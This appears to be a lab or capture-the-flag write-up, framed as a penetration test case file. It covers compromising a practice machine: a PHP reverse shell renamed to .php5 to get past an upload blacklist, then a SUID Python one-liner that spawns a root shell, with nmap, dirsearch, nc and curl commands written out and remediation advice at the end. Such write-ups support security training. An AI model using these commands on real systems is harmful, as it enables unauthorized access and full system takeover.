PHP upload bypass and SUID Python privilege escalation
Foundations Linux engagement: /panel rejected .php but accepted .php5 for a reverse shell as www-data; SUID /usr/bin/python spawned a root shell via GTFOBins.
- Case files
- PHP upload bypass and SUID Python privilege escalation
Directory brute force found an upload panel with a weak extension blacklist. A .php5 reverse shell landed as www-data; SUID Python completed root.
nmap and dirsearch found /panel/. Renaming the reverse shell to .php5 bypassed the blacklist.
SUID /usr/bin/python with -p shell spawn completed privilege escalation.
Engagement summary
Directory brute force found an upload panel with a weak extension blacklist. A .php5 reverse shell landed as www-data; SUID Python completed root.
ROOTME (10.10.15.83) exposed OpenSSH and Apache. dirsearch located /panel/ (upload) and /uploads/. The panel blocked .php but accepted .php5; we uploaded a pentestmonkey reverse shell renamed to shell.php5, triggered it from /uploads/, and caught www-data. find for SUID binaries returned /usr/bin/python; python -c with os.execl('/bin/sh','sh','-p') yielded a root shell.
Business impact
Extension blacklists are not a security control — content-type and execution isolation are. SUID interpreters are root by design. Serve uploads from a non-executable store, allowlist extensions, and remove SUID from Python.
Upload panel and .php5 bypass
nmap and dirsearch found /panel/. Renaming the reverse shell to .php5 bypassed the blacklist.
OPERATOR · RECON
savvy@lab:~$ nmap 10.10.15.83 -sV -sC
22/tcp open ssh OpenSSH 7.6p1 Ubuntu
80/tcp open http Apache httpd 2.4.29
savvy@lab:~$ dirsearch -u http://10.10.15.83
/panel/ /uploads/
OPERATOR · UPLOAD RCE
savvy@lab:~$ cp php-reverse-shell.php shell.php5
# upload shell.php5 via http://10.10.15.83/panel/
savvy@lab:~$ nc -lnvp 1234
savvy@lab:~$ curl http://10.10.15.83/uploads/shell.php5
savvy@lab:/var/www$
savvy@lab:~$ id
uid=33(www-data) gid=33(www-data)
SUID Python to root
SUID /usr/bin/python with -p shell spawn completed privilege escalation.
OPERATOR · SUID
savvy@lab:~$ find / -user root -perm /4000 2>/dev/null
/usr/bin/python
savvy@lab:~$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Allowlist upload extensions and store files outside the web root without execute. Audit SUID binaries regularly; never leave interpreters setuid.